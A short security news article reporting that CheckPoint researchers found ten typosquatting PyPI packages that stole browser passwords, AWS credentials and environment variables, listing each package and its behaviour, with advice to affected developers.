10 Malicious PyPI Packages Steal Credentials

10 Malicious PyPI Packages
Written by Emma Davis

Another case of malware penetration into PyPI was discovered – 10 malicious packages were removed from the repository at once, as they could steal data from developers, including passwords and API tokens.

The problem is being reported by researchers at CheckPoint. Malicious packages have traditionally relied on typesquatting to spread, they said, meaning they were downloaded if a user misspelled the name of a genuinely popular package.

Let me remind you that we also talked about The Student Makes a Joke and Placed the Ransomware in the PyPI Repository, and also that Malicious PyPI Packages Steal AWS Accounts.

Such attacks became more frequent and grew in impact in recent years, therefore it is essential developers make sure are keeping their actions safe, double checking every software ingredient in use and especially such that are being downloaded from different repositories, especially ones which were not self-created.CheckPoint specialists write.

In their report, the experts talk about the detection of the following malicious libraries.

  1. Ascii2text: Downloads a malicious script that collects passwords stored in browsers including Google Chrome, Microsoft Edge, Brave, Opera and Yandex Browser.
  2. Pyg-utils, Pymocks and PyProto2: Targeted at stealing credentials from AWS and very similar to another malware suite discovered by Sonatype in June. The first package even connects to the same domain (pygrata.com) and the other two use pymocks.com.
  3. Test-async and Zlibsrc: Download and execute malicious code from an external source during installation.
  4. Free-net-vpn, Free-net-vpn2 and WINRPCexploit: steal user credentials and environment variables.
  5. Browserdiv: Steals credentials and other information stored in the browser’s local storage folder. Uses Discord webhooks to steal data.

10 Malicious PyPI Packages
Fake / real library

The researchers do not know exactly how many times these malicious packages were downloaded, but they write that we are talking about at least hundreds of downloads.

While the malware has now been removed from PyPI, developers who download these packages may still be at risk. The researchers recommend victims to consider their machines completely compromised and take appropriate measures to “clean up” the system.

User Review
0 (0 votes)
Comments Rating 0 (0 reviews)

About the author

Emma Davis

I'm writer and content manager (a short time ago completed a bachelor degree in Marketing from the Gustavus Adolphus College). For now, I have a deep drive to study cyber security.

Leave a Reply